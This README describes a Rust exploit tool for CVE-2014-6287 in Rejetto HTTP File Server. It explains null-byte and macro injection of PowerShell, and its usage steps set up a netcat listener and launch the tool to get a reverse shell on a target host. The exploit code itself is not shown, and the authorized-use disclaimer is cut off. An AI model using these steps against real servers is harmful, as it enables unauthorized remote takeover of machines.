CVE-2014-6287 - Rejetto HTTP File Server RCE Exploit
A Rust implementation of the CVE-2014-6287 exploit targeting Rejetto HTTP File Server (HFS) versions 2.3x before 2.3c.
Vulnerability Overview
CVE-2014-6287 is a critical remote code execution vulnerability in Rejetto HTTP File Server (HFS).
Technical Details
- Affected Software: Rejetto HTTP File Server (HFS) 2.3x before 2.3c
- Vulnerability Type: Remote Code Execution (RCE)
- CVSS Score: 10.0 (Critical)
- CWE: CWE-94 (Improper Control of Generation of Code)
Description
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server allows remote attackers to execute arbitrary programs via a %00 sequence in a search action. This vulnerability enables attackers to bypass input validation and inject malicious code that gets executed on the target system.
The exploit works by:
- Crafting a malicious search query containing a null byte (
%00) - Injecting PowerShell commands within macro delimiters
{.and.} - The server processes the macro and executes the embedded PowerShell code
- Establishing a reverse shell connection back to the attacker
Usage
Step 1: Set up a Netcat Listener
Before executing the exploit, set up a listener on your attacking machine to catch the reverse shell:
# Replace <LPORT> with your desired listening port
nc -lvnp <LPORT>Step 2: Execute the Exploit
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]Required Parameters:
-l, --lhost <LHOST>: Your local IP address (attacker machine)-p, --lport <LPORT>: Your local port for the reverse shell-r, --rhost <RHOST>: Target IP address (vulnerable HFS server)
Optional Parameters:
-t, --rport <RPORT>: Target port (default: 80)
Disclaimer
This tool is for educational and authorized penetration testing purposes only. Use responsibly and only on systems you own or have explicit permission to